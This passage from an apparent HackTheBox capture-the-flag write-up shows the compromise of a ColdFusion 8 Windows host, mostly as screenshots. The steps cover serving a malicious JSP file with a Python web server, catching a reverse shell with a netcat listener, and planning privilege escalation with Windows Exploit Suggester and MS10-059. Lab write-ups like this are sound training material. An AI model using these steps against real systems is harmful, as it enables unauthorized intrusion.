https://substackcdn.com/image/fetch/$s_!yNo5!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F47a64f88-fc9b-4c0b-b33f-5de16bd8e092_800x619.png 848w, https://substackcdn.com/image/fetch/$s_!yNo5!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F47a64f88-fc9b-4c0b-b33f-5de16bd8e092_800x619.png 1272w, https://substackcdn.com/image/fetch/$s_!yNo5!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F47a64f88-fc9b-4c0b-b33f-5de16bd8e092_800x619.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!yNo5!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F47a64f88-fc9b-4c0b-b33f-5de16bd8e092_800x619.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/47a64f88-fc9b-4c0b-b33f-5de16bd8e092_800x619.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!yNo5!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F47a64f88-fc9b-4c0b-b33f-5de16bd8e092_800x619.png 424w, https://substackcdn.com/image/fetch/$s_!yNo5!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F47a64f88-fc9b-4c0b-b33f-5de16bd8e092_800x619.png 848w, https://substackcdn.com/image/fetch/$s_!yNo5!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F47a64f88-fc9b-4c0b-b33f-5de16bd8e092_800x619.png 1272w, https://substackcdn.com/image/fetch/$s_!yNo5!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F47a64f88-fc9b-4c0b-b33f-5de16bd8e092_800x619.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>We configure the location for the file to hosted (green arrow; <em><strong>C:\ColdFusion8\wwwroot\CFIDE\don.jsp</strong></em>) and the location to pull the file from (red arrow). To get it there, we will need to run a Python SimpleHTTPServer (<em>python -m SimpleHTTPServer 80</em>) in the directory with the file. (Note we must declare port 80, other SimpleHTTPServer will listen on Port 8000).</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!frJ6!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F570b2d25-89cd-4f13-bbbc-6c8348568ffa_800x78.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!frJ6!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F570b2d25-89cd-4f13-bbbc-6c8348568ffa_800x78.png 424w, https://substackcdn.com/image/fetch/$s_!frJ6!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F570b2d25-89cd-4f13-bbbc-6c8348568ffa_800x78.png 848w, https://substackcdn.com/image/fetch/$s_!frJ6!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F570b2d25-89cd-4f13-bbbc-6c8348568ffa_800x78.png 1272w, https://substackcdn.com/image/fetch/$s_!frJ6!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F570b2d25-89cd-4f13-bbbc-6c8348568ffa_800x78.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!frJ6!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F570b2d25-89cd-4f13-bbbc-6c8348568ffa_800x78.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/570b2d25-89cd-4f13-bbbc-6c8348568ffa_800x78.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!frJ6!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F570b2d25-89cd-4f13-bbbc-6c8348568ffa_800x78.png 424w, https://substackcdn.com/image/fetch/$s_!frJ6!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F570b2d25-89cd-4f13-bbbc-6c8348568ffa_800x78.png 848w, https://substackcdn.com/image/fetch/$s_!frJ6!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F570b2d25-89cd-4f13-bbbc-6c8348568ffa_800x78.png 1272w, https://substackcdn.com/image/fetch/$s_!frJ6!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F570b2d25-89cd-4f13-bbbc-6c8348568ffa_800x78.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Next, we set up a netcat listener on the 1337est port, 1337 using <em>nc -nlvp 1337</em></p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!wzbh!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F76c38051-e2c5-4e84-90ae-9d63fab00a65_800x442.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!wzbh!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F76c38051-e2c5-4e84-90ae-9d63fab00a65_800x442.png 424w, https://substackcdn.com/image/fetch/$s_!wzbh!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F76c38051-e2c5-4e84-90ae-9d63fab00a65_800x442.png 848w, https://substackcdn.com/image/fetch/$s_!wzbh!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F76c38051-e2c5-4e84-90ae-9d63fab00a65_800x442.png 1272w, https://substackcdn.com/image/fetch/$s_!wzbh!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F76c38051-e2c5-4e84-90ae-9d63fab00a65_800x442.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!wzbh!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F76c38051-e2c5-4e84-90ae-9d63fab00a65_800x442.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/76c38051-e2c5-4e84-90ae-9d63fab00a65_800x442.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!wzbh!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F76c38051-e2c5-4e84-90ae-9d63fab00a65_800x442.png 424w, https://substackcdn.com/image/fetch/$s_!wzbh!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F76c38051-e2c5-4e84-90ae-9d63fab00a65_800x442.png 848w, https://substackcdn.com/image/fetch/$s_!wzbh!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F76c38051-e2c5-4e84-90ae-9d63fab00a65_800x442.png 1272w, https://substackcdn.com/image/fetch/$s_!wzbh!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F76c38051-e2c5-4e84-90ae-9d63fab00a65_800x442.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Let&#8217;s wee what&#8217;s here, nothing to write home about, but we have a shell.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!8d5o!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F068bd2e0-87d9-4da0-8c09-28358474c453_800x697.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!8d5o!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F068bd2e0-87d9-4da0-8c09-28358474c453_800x697.png 424w, https://substackcdn.com/image/fetch/$s_!8d5o!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F068bd2e0-87d9-4da0-8c09-28358474c453_800x697.png 848w, https://substackcdn.com/image/fetch/$s_!8d5o!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F068bd2e0-87d9-4da0-8c09-28358474c453_800x697.png 1272w, https://substackcdn.com/image/fetch/$s_!8d5o!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F068bd2e0-87d9-4da0-8c09-28358474c453_800x697.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!8d5o!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F068bd2e0-87d9-4da0-8c09-28358474c453_800x697.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/068bd2e0-87d9-4da0-8c09-28358474c453_800x697.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!8d5o!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F068bd2e0-87d9-4da0-8c09-28358474c453_800x697.png 424w, https://substackcdn.com/image/fetch/$s_!8d5o!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F068bd2e0-87d9-4da0-8c09-28358474c453_800x697.png 848w, https://substackcdn.com/image/fetch/$s_!8d5o!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F068bd2e0-87d9-4da0-8c09-28358474c453_800x697.png 1272w, https://substackcdn.com/image/fetch/$s_!8d5o!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F068bd2e0-87d9-4da0-8c09-28358474c453_800x697.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Let&#8217;s get the user flag.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!a7NO!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fa134709f-57f1-49a6-83a9-a2b12241c9d3_758x558.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!a7NO!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fa134709f-57f1-49a6-83a9-a2b12241c9d3_758x558.png 424w, https://substackcdn.com/image/fetch/$s_!a7NO!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fa134709f-57f1-49a6-83a9-a2b12241c9d3_758x558.png 848w, https://substackcdn.com/image/fetch/$s_!a7NO!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fa134709f-57f1-49a6-83a9-a2b12241c9d3_758x558.png 1272w, https://substackcdn.com/image/fetch/$s_!a7NO!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fa134709f-57f1-49a6-83a9-a2b12241c9d3_758x558.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!a7NO!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fa134709f-57f1-49a6-83a9-a2b12241c9d3_758x558.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/a134709f-57f1-49a6-83a9-a2b12241c9d3_758x558.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!a7NO!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fa134709f-57f1-49a6-83a9-a2b12241c9d3_758x558.png 424w, https://substackcdn.com/image/fetch/$s_!a7NO!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fa134709f-57f1-49a6-83a9-a2b12241c9d3_758x558.png 848w, https://substackcdn.com/image/fetch/$s_!a7NO!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fa134709f-57f1-49a6-83a9-a2b12241c9d3_758x558.png 1272w, https://substackcdn.com/image/fetch/$s_!a7NO!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fa134709f-57f1-49a6-83a9-a2b12241c9d3_758x558.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!m3qP!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Feefd9caa-749f-4133-a232-7b738bf9eb90_800x663.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!m3qP!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Feefd9caa-749f-4133-a232-7b738bf9eb90_800x663.png 424w, https://substackcdn.com/image/fetch/$s_!m3qP!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Feefd9caa-749f-4133-a232-7b738bf9eb90_800x663.png 848w, https://substackcdn.com/image/fetch/$s_!m3qP!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Feefd9caa-749f-4133-a232-7b738bf9eb90_800x663.png 1272w, https://substackcdn.com/image/fetch/$s_!m3qP!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Feefd9caa-749f-4133-a232-7b738bf9eb90_800x663.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!m3qP!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Feefd9caa-749f-4133-a232-7b738bf9eb90_800x663.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/eefd9caa-749f-4133-a232-7b738bf9eb90_800x663.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!m3qP!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Feefd9caa-749f-4133-a232-7b738bf9eb90_800x663.png 424w, https://substackcdn.com/image/fetch/$s_!m3qP!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Feefd9caa-749f-4133-a232-7b738bf9eb90_800x663.png 848w, https://substackcdn.com/image/fetch/$s_!m3qP!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Feefd9caa-749f-4133-a232-7b738bf9eb90_800x663.png 1272w, https://substackcdn.com/image/fetch/$s_!m3qP!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Feefd9caa-749f-4133-a232-7b738bf9eb90_800x663.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Wha-BAM! Now, let&#8217;s get some more information about the system so we can pwn for root. the <em>systeminfo</em> command is a good way to do this. (Note: this will help tremendously in a few minutes with the <a href="https://github.com/GDSSecurity/Windows-Exploit-Suggester">Windows Exploit Suggester</a>).</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!WNlF!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F989d784d-4d0c-4fd9-af6c-fdaf3ed75f95_800x693.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!WNlF!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F989d784d-4d0c-4fd9-af6c-fdaf3ed75f95_800x693.png 424w, https://substackcdn.com/image/fetch/$s_!WNlF!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F989d784d-4d0c-4fd9-af6c-fdaf3ed75f95_800x693.png 848w, https://substackcdn.com/image/fetch/$s_!WNlF!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F989d784d-4d0c-4fd9-af6c-fdaf3ed75f95_800x693.png 1272w, https://substackcdn.com/image/fetch/$s_!WNlF!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F989d784d-4d0c-4fd9-af6c-fdaf3ed75f95_800x693.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!WNlF!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F989d784d-4d0c-4fd9-af6c-fdaf3ed75f95_800x693.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/989d784d-4d0c-4fd9-af6c-fdaf3ed75f95_800x693.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!WNlF!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F989d784d-4d0c-4fd9-af6c-fdaf3ed75f95_800x693.png 424w, https://substackcdn.com/image/fetch/$s_!WNlF!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F989d784d-4d0c-4fd9-af6c-fdaf3ed75f95_800x693.png 848w, https://substackcdn.com/image/fetch/$s_!WNlF!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F989d784d-4d0c-4fd9-af6c-fdaf3ed75f95_800x693.png 1272w, https://substackcdn.com/image/fetch/$s_!WNlF!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F989d784d-4d0c-4fd9-af6c-fdaf3ed75f95_800x693.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Let&#8217;s dump the systeminfo into the <a href="https://github.com/GDSSecurity/Windows-Exploit-Suggester">Windows Exploit Suggester</a>. Trial and error is the best way to validate this information. In some cases, you may have to complile the executables, in others, it may require user intervention (which does not jive in HTB, CTFs, or OSCP). I like the looks of MS10&#8211;059.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!R8wr!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fb9f34e9b-f5d6-4f3e-86ba-bf47ae55396d_800x266.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" 